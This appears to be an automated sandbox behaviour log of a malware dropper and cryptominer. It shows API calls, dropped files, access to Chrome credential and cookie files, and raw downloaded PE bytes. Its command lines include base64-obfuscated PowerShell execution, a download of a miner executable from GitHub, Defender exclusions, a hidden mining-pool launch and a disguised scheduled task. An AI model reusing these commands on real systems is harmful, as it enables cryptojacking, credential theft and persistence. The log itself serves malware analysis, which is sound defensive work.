protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04df0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04d80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description 94cd32df1e.exe tried to sleep 627 seconds, actually delayed analysis time by 627 seconds
description namez.exe tried to sleep 148 seconds, actually delayed analysis time by 148 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 2424914
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2424914
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x000001f0
output_buffer: 
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x000001f0
output_buffer: 
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x000001f0
output_buffer: 
1 1 0

DeviceIoControl

input_buffer:
control_code: 475228 (IOCTL_DISK_GET_LENGTH_INFO)
device_handle: 0x000001f0
output_buffer: 
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\lockfile
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\2m8357.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\1o76j7.exe
file C:\Users\test22\AppData\Local\Temp\10000260101\de854920e3.exe
file C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe
file C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd
file C:\Users\test22\AppData\Local\Temp\10074671121\690BRuM.cmd
file C:\Windows\Temp\{C114507B-F32B-4B28-B4B2-1318F2E1E559}\.cr\hvof1h0.exe
file C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\CC3260MT.dll
file C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\Entropy.dll
file C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\BorlndMm.dll
file C:\Users\test22\AppData\Local\Temp\10013260101\xztOH3r.exe
file C:\Users\test22\AppData\Local\Temp\10068930101\pOqYWAZ.exe
file C:\Users\test22\AppData\Local\Temp\10074640101\lBiQciH.exe
file C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\Install.dll
file C:\Users\test22\AppData\Local\Temp\10064520101\lBiQciH.exe
file C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe
file C:\Users\test22\AppData\Local\Temp\10001030101\LAc2heq.exe
file C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe
file C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\wspconfig.dll
file C:\Users\test22\AppData\Local\Temp\SystemService\miner_loop.bat
file C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\StlpMt45.dll
file C:\Users\test22\AppData\Local\Temp\10074650101\235T1TS.exe
file C:\Users\test22\AppData\Local\Temp\10037070101\i5Kz53x.exe
file C:\Users\test22\AppData\Local\Temp\10072280101\eZp5zCz.exe
file C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\MindClient.dll
file C:\Windows\Temp\{DD44DF47-B1D2-4CCE-B7A7-2E9D94F17EDB}\.ba\Portal-Ech64.exe
file C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe
file C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
file C:\Users\test22\AppData\Local\Temp\10074660101\i5Kz53x.exe
file C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe
file C:\Users\test22\AppData\Local\Temp\SystemService\install.bat
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Local\Temp\SystemService\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk
cmdline PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
cmdline powershell -WindowStyle Hidden -Command "Start-Process -WindowStyle Hidden -FilePath 'C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe' -ArgumentList '--url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25'"
cmdline "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd"
cmdline C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\hjvegayfkdgz', 'C:\Users', 'C:\ProgramData'"
cmdline C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\pptvscyct', 'C:\Users', 'C:\ProgramData'"
cmdline Cmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
cmdline powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\test22\AppData\Local\pptvscyct\erfwnvwyrxrr.exe'"
cmdline powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\hjvegayfkdgz', 'C:\Users', 'C:\ProgramData'"
cmdline powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\pptvscyct', 'C:\Users', 'C:\ProgramData'"
cmdline C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\test22\AppData\Local\pptvscyct\erfwnvwyrxrr.exe'"
cmdline C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\SystemService\miner_loop.bat
cmdline schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"
file C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
file C:\Users\test22\AppData\Local\Temp\10000260101\de854920e3.exe
file C:\Users\test22\AppData\Local\Temp\10001030101\LAc2heq.exe
file C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe
file C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe
file C:\Users\test22\AppData\Local\Temp\10013260101\xztOH3r.exe
file C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe
file C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd
file C:\Users\test22\AppData\Local\Temp\10064520101\lBiQciH.exe
file C:\Users\test22\AppData\Local\Temp\10068930101\pOqYWAZ.exe
file C:\Users\test22\AppData\Local\Temp\10072280101\eZp5zCz.exe
file C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe
file C:\Users\test22\AppData\Local\Temp\10074660101\i5Kz53x.exe
file C:\Users\test22\AppData\Local\Temp\SystemService\install.bat
file C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
file C:\Windows\Temp\{C114507B-F32B-4B28-B4B2-1318F2E1E559}\.cr\hvof1h0.exe
file C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe
file C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
file C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe
file C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe
file C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
file C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe
wmi SELECT * FROM Win32_Process
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM Win32_DiskDrive
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10000260101\de854920e3.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10000260101\de854920e3.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10001030101\LAc2heq.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10001030101\LAc2heq.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10001850101\Hmcm0Oj.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10004650101\235T1TS.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10013260101\xztOH3r.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10013260101\xztOH3r.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10036890101\94cd32df1e.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10037070101\i5Kz53x.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10037070101\i5Kz53x.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10049091121\690BRuM.cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10064520101\lBiQciH.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10064520101\lBiQciH.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10068930101\pOqYWAZ.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10068930101\pOqYWAZ.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10072280101\eZp5zCz.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10072280101\eZp5zCz.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10073290101\hvof1h0.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10074640101\lBiQciH.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10074640101\lBiQciH.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10074650101\235T1TS.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10074650101\235T1TS.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\10074660101\i5Kz53x.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\10074660101\i5Kz53x.exe
1 1 0

CreateProcessInternalW

thread_identifier: 1968
thread_handle: 0x000000000000006c
process_identifier: 1168
current_directory: C:\Users\test22\AppData\Local\Temp\SystemService
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -WindowStyle Hidden -Command "Start-Process -WindowStyle Hidden -FilePath 'C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe' -ArgumentList '--url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25'"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000068
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† Çqhð" >hí@ÀKy`pì(°¼PÌÀl°[@XïÀ.textŠ<> `.rdataŒÀPÂF@@.dataØ( @À.pdataÌP@@.B8ô p0 `.gxfgp€>@@.retplneŒ T_RDATAô°V@@.reloclÀX@B.jsslÐl`@À.jssl@ lÌ @À.rsrc¼°8@@AWAVAUATVWUSHƒìhH‰ÎH‹¦H1àH‰D$`‹I‰È5‹ÝL‰!È÷сá‹ÝL‰‰Õ÷Չׁ÷‹ÝL‰!ý!׉Ê!Â1È Ð‰é!ù1ï ωÁ÷сá¿‚,%í@}Ó È‰ù÷сá¿‚,çí@}Ó Ï1ÇH‰ñè­ÏH‰D$(H‹NI‰ÉI÷ÑHºè"s¾s™=L‰ÈH!ÐH÷ÒH!ÊHÁé‰L$0H ÂH¸݌AåŒfÂH1ÐI1ÁI!ÁA½BÙëOE1äA»4;ÓáAý3;Óá~ké͋7Hÿ¯È‰È÷Ѓàþƒñ Áƒùÿ”Àƒ= œÁ‰Ê0ÂÁ€ñщÈ0и…u¾Z½ˆ¶"BEńÉA½…u¾ZDEè„ÒDDè€Aý3;ÓágAý4'੎*AýÞw)ÄŽÞAý¾xÑяòAýßw)Ä„fÿÿÿAý†ÑÌuºH‹D$@HƒøA½ÙUš’¸¿xÑÑDLèE1öAý3;Óá~ŸfDAýAÙëOŽ3Aý`ý2d޶Aý]—v€Aýaý2d„’Aý2mLg…Oÿÿÿ‹D$0‹L$T9ÁœD$7‹‹ Pÿ¯Ð‰Ð÷Љƃæþƒâ ò÷Ò Âƒúÿ”À•ƒù ŸÃƒù œÁ Ñ Øȉ٠Ñ0ÓˉÙ0Á„ÛA½ çïº4;ÓáDEê„ÀA»4;ÓáDDê„ɸ çïé% f.„fAý}S×£GAýV駍„AýÙUš’„1AýÀ›]¡…ŒþÿÿHcD$0HÁàHD$(H‰D$8L‰L$@A½V駍Aý3;ÓáŽjþÿÿéÌþÿÿf.„fAý‰¹1Aý4;Óá„ôAý çï„Aýæ]®…þÿÿA½¨Ž¤ÕD‹T$HAý3;ÓᎠþÿÿéoþÿÿAý5'à©„åAýäÚᬄ©AýïU—¸…ØýÿÿA½‰¹1Aý3;ÓáŽÎýÿÿé0þÿÿAýBÙëO„ôAý…u¾Z„SAý-Æ×[…™ýÿÿH‹D$@HƒøA½~S×£¸¨Ž¤ÕDDèE1ÒAý3;ÓáŽzýÿÿéÜýÿÿAý~S×£„Aýº¨p§„(Aý‹©…Eýÿÿ‹L$\Áé ‹l$\‰ê÷ҁâFþQ-‰è%¹®Ò ЉÊ÷Ò5FþQ- Ð÷Ёâ=!ùkáÂÞ Ñ1éñ=!ùk!é‰Â!Ê1Á ÑiÁ•éÑ[‰ÁÁé÷щÊ1Â÷Ò! Á÷щÐ!È1Ñ Á‹³Pÿ¯Ð‰Ð÷Ð%%ÿHâÚê· Â‰Ð5Ú귃àþò$ÿH ‰Ð÷Ð%©¬ˆÉâVSw6 òVSw6”Ã=m œÂ0ӉØöРЉÚ0„ÛA½äÚᬽsÕzDEí„À¸äÚá¬DDè‰L$L„ÒDEíAý3;ÓáŽPüÿÿé²üÿÿAý‰¹1„#AýE¼ô<„¦Aýˆ¶"B…üÿÿH‹D$8‹D$X‹D$X‹D$X‹D$X‹D$X‹D$X‹D$X‹D$XA½…u¾ZAý3;ÓáŽìûÿÿéNüÿÿAý¿xÑÑ„«Aý¨Ž¤Õ…ÄûÿÿH‹D$8¾D‰Ð÷ЉŁͶ'ïF‰ê÷҉Ë÷Ӊ΁ö¶'ïF!ށáIعD‰ÓËÈ!ãéÄa% + ؁åéÄaâI˜ ê1‰ð!È1ñ Á‰Ð÷Ð%àë­ÁâR> ‰È÷Ð%àë­ÁáR> Á1ÑiÁ•éÑ[D‹|$P÷ЉÁD1ù÷ÑD!ùD‰ú÷ҁâ2–“AçàÍilA ×A÷2–“A ÇA÷׉ÈD!øA1ÏA ÇA½E¼ô<Aý3;ÓáŽ÷úÿÿéYûÿÿAý ]—v„KAýsÕz…ÏúÿÿéW‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\‹D$\A½5'à©Aý3;ÓᎠùÿÿéúÿÿH‹D$@HƒøA½†ÑÌ¸-Æ×[DLèAý3;ÓáŽvùÿÿéØùÿÿH‹D$8D¾pAÁæA½¿xÑÑAý3;ÓáŽPùÿÿé²ùÿÿ‹D
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† WPþgð" BdH<@@` $ (  ¸)0 Ô °Ý(Ðu@X' .textF@B `.rdata\÷`øJ@@.datax<` B @À.pdata¸)  *V @@.B6ûÐ € `.gxfgà „ @@.retplneŒ ¤ .tls  ¦ @À_RDATAô ¨ @@.relocÔ 0 ª @B.jssv@ v´ @À.jssvÀv*@ÀAWAVAUATVWUSHì¸H‹¦S H1àH‰„$°‹-™c ‹5—c }ÿ¯ý‰û÷Ӂ累$.‰ÝåKPÛÑ ýõJPÛуãþ ë‰Ý÷Ձå⠋ãôto ëóôto”D$ZA”ÀA•Áƒþ ŸÃƒþ œD$[œÀDˀóD0ÀA‰ØA À0ØDÀ½ÀçÄ{à†Dè‰l$T½Ù ñDè‰l$P½ÒtD¸¡£l-Dè‰l$L½{£œ/Dè‰l$H½A„Í,¸ðÖ)Dè‰l$D½áD  Dè‰l$@½$ v¯¸Ð¨-Dè‰l$<‰T$8ºhñ¡fDЉT$4ºÚۺ̸ZɍDЉT$(ºû × DЉT$0AºF­9ð¸‡&äíDDк-‚]HDЉT$,A½¼áf¸È2cGDDè¸á†ùA¿~ºÙ-A¼>¬ùA‰Á=T€ÏfAùÉKÕߎÉAùØ ñŽáAùá†ùŽ¿Aùá†ù„ÍAùƒgç„D‰ÈAùû × u©‹D$h‹”$9œD$o‹D$(두AùÒtDŽ3Aù»áfޝAùy©z޵AùÀ预 D‰ÈAùy©z…Lÿÿÿ‹D$$‰„$Œ‹D$ ‰„$‹D$,é-ÿÿÿf.„Aù¯¿J«<AùYɍxAù¤{à†„eD‰ÈAùn„…éþÿÿH‹D$p¾8D‰Ú÷ҁâ @¬D‰Ø%0 ЉÁó 5îoÏÿD‰ÚòÓ°p¬D!ډþ÷։ýõÓ°p¬!î!ý‰×÷×A‰ÀAàŸòãÃ0` D à øçŸòâçp` ú1Ú÷РЉó÷Ӊê÷҉߁çË¹ïæ4ðF þ Ӂâ˹ïå4ðF Õ1õ÷Ó ë‰Â÷ҁâ\¶Å%£pI: ЉÚ÷ҁâ\¶Åã£pI: Ó1ÃiӕéÑ[D‹„$Œ‰Ó÷ӉØ%Á½âï>€B ‰փöòËÛS<‰Ø÷ÐD‰ÅõÛS<D!ÅAÈ$ê¬ÃD‰Ç÷ׁÊ¢ˆ€âǶˆæS, ցãǶˆ% H$C Ø1ð‰ê÷ÒD‰Ãã÷iŸç@8 ßA Ёâ÷iŸå–`ú Õ1ýA÷ÐA è‰Â÷ҁâ%ÛOˆ%Ú$°w ÐD‰Â÷ҁâ%ÛOˆAàÚ$°wA ÐA1À¸Àé¢éQýÿÿAù@„Í,ŸAùïÖ)ÎAùU€Ï„ÕD‰ÈAù“Æ…ýÿÿH‹D$xHƒø¸uõÿ*ºÊKÕßLÂE1öéûüÿÿAù¿çÄAùÊKÕß„D‰ÈAù‡&äí…Ñüÿÿ¸-‚]HéÇüÿÿAù,‚]H­AùÒtD„ëD‰ÈAùÈ2cG…üÿÿH‰Œ$˜H‹„$˜H‰„$ ¸¯ê=ވš'~)=߈š'tU=~ºÙ-„Ë=‚–9Tuàé¹f.„=¯ê„+=M[ب„F=>¬ùu³H‹„$˜¸ßˆš'=ވš'¦ëÍH‹¼$˜‹k^ hÿ¯è‰è÷ЉÁãÂå‹Ìå=t3 ݁õ<t31è…è•Àƒ=A^ ŸÃ‰ÚÂ0ÃA‰ÙA0ф۸>¬ù»M[بEÃH‹7„ÒAEÄH‰´$¨E„ÉDÃ=ވš'(ÿÿÿéLÿÿÿ‹ò] ‹=ð] Xÿ¯Ø‰Ý÷Ձ㼭@â‰è%CR¿ Ø5BR¿ƒåþ ŃýÿA•Á”Àƒÿ œÂƒÿ ŸÃ ØD ʉØD ÈD0ËÉØ0н߈š'AEì„۸߈š'EńÒDÅ=ވš'¦þÿÿéÊþÿÿHƒy¸‚–9TAGÇH‹”$ =ވš'€þÿÿé¤þÿÿH‹„$¨¸‚–9T=ވš'cþÿÿé‡þÿÿAù>^±æAù°¿J«„%D‰ÈAù$ v¯…­úÿÿ‹D$@é¤úÿÿAùϨ-ÙAùA„Í,„D‰ÈAù¡£l-…zúÿÿ‹„$‹„$‹„$‹„$‹„$H‹D$`‹„$Œ‹„$Œ‹„$Œ‹„$‹„$‹„$‹„$‹„$¸{£œ/éúÿÿAùÙ ñ„”D‰ÈAù˅Kù…óùÿÿHcD$hHÁàHD$`H‰D$pH‹AH‰ÂH÷ÒH‰ÕHƒåüƒàH èH1ÂH!ÂH‰T$x¸ƒgçé´ùÿÿAù¼áf„„D‰ÈAùF5Nq…—ùÿÿ‹D$HéŽùÿÿAùZɍ„xD‰ÈAùáD  …qùÿÿ‹
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL£hýgà tz@t@0@…,¤<@°Ì¬Ø¥p.textCrt `.rdata֐x@@.data„°|–@À.rsrc°Ì@Î@@.reloc¬à@BúôÃÌÌÌÌÌÌÌÌÌÌÌÌÌUSWVƒì‹L$(1À…É„vf9MZ…k‹q<<1PE…[öD1 „P‹T1x…Ò„Dƒ|1|„9‹l…í„-)‰D$‹D ȉD$ ‹D$ȉ$1ۉl$f‹D$ ‹˜Ⱥÿÿÿÿ1ö‰÷€|Rvuñ…Ò„¿‰\$1ۃú‚x‰ÖÁî1ۃþtIÁïƒçþ1ÛfD·0Þ·XÁã 1óÁæ1Þ·hõÁî õ·pÁæ 1îÁå1õƒÀ‰ëÁë ëƒÇþuÅö‹l$t·Ó·@Áà 1ØÁã1ÉØÁè ÍÝ1؉ÂÁê‰ÐÁà1ЉÂÁê‰ÖÁæ1։ðÁèð‹\$;D$,u ë1À;D$,t C1À9ë…ÿÿÿë‹$·X‹T$ ‚‰ÈƒÄ^_[]ÂÌÌÌÌÌÌÌÌÌÌÌWVPd¡0‹@ ‹@ ‹‹‹@‰ÆÇ$hðüT¡Pè6þÿÿƒì(`‘@$ÿЉÇ(p‘@)+F(€‘@)+F(‘@) +F( ‘@)0+F¹€¶‘ý¯@ˆTý¶‘þ¯@ˆTþ¶‘ÿ¯@ˆTÿ¶‘°@ˆƒÁùã uÊj@h+Fhà Wè(ƒÄhrƲ:VèŠýÿÿ‰áQj@hà WÿЉøƒÄ^_ÃÌÌÌÌÌUSWVì‹´$(‹¬$$(°‘@D$(À‘@D$(Б@D$((à‘@D$8(ð‘@D$H(’@D$X(’@D$h( ’@D$x(0’@„$ˆ(@’@„$˜(P’@„$¨(`’@„$¸(p’@„$È(€’@„$Ø(’@„$è( ’@„$ø1É1ÿë$f.„¶D €PˆD AùtV¶D ˆD$‰ûÉÈ1Ò÷ö\‰ß¶Ã¶\$¶TˆT ˆ\öÂt°‰Ê)ÂöÂt€Ãëf€ó7ˆ\Aùuªƒ¼$ „¥1ö1Û1Éé€ÀÀ‰ÂÀê0¶úý‰$‰Èº“$I’÷ê)<$¿“$I’ʉÐÁèÁêÕ)ÂÊ$ˆT,¶D4¶T,‰ÈЍ”ÿIЁâÿÿÿ)Ѝ“ÿ…ÛIӁâÿÿÿ)Ó¶TTÀ‰ÐÀè0жÀÅ)ÉÈ÷ïʉÐÁèÁúÕ)ÂÊÊÚҀòU‰ÓÐëӍQ…ÉIсâð‰È)жӍR‹¼$20ЈA9Œ$ ‹\$„–F–…ÀIЁâÿÿÿ÷ÚÖF¶D4É\$¶ë¶T,ˆT4ˆD,.iú·mÇI·ÿÿ’$v5‰ó¯Ýiû§7½éÇ²ÿ,d! †˜þÿÿö„þÿÿöT4ëf„ÐD4‰ó¯Ý¿“$I’é³þÿÿÄ^_[]ÃÌÌVd¡0‹@ ‹@ ‹‹‹@hðüT¡Pè!úÿÿ(°’@)@+F(À’@)P+F(В@)`+F(à’@)p+Fƒì(ð’@$ÿЉƸf¶ˆÝ¼@ˆLý¶ˆÞ¼@ˆLþ¶ˆß¼@ˆLÿ¶ˆà¼@ˆ ƒÀ=luËj@h@+FhlVèüÿÿƒÄè!ûÿÿ…ÀtVÿÐ^Ã^ébùÿÿÌÌUSWVƒì ¡€+F‰D$· „+F¶¤+F‰L$öá¢È+Fƒ=,FtÆŠ+Ffƒ=,FˆD$x'¡ä+F+ø+F£Ì+F¡Ø+F½†FïL)ņ‰D$ë ½ ÆïLÇD$„ôÒ¶=è+F‰ø+˜+F‹ ,F‰L$ ‹ ´+F‹Ð+FZÿùƒ¼IQ¾–¨ÿÿEó‰t$¿5Œ+F‰t$f£¤+F¸šÿ„˜‹Ì+FúüË,†Á‰î»R‘=,F2fOr·=œ+F·Ú1ûfÇô+F…ä‹=ì+F‘°œ+Y‰ ,F¿-À+F…턺™÷ýf£†+FÇÐ+F†…ö„»‹T$òtüÿÿùƒ¼IQ¸iVEÂ1Ò÷ö˜éžf1ˆ+F·À+Ff¯ø+F‹,F3,F‰Ø+F˜‹Ì+FúüË,‡?ÿÿÿ‹5¨+F·=ˆ+F)þ‰5ð+F¶5’+Fö™ÿÿ‰t$‰î»R‘=,F2fOƒÿÿÿé%ÿÿÿf¸f£†+FÇÐ+F†…ö…Eÿÿÿ¸£°+FÇºÓÿÿ¿ÏñfôF‰ 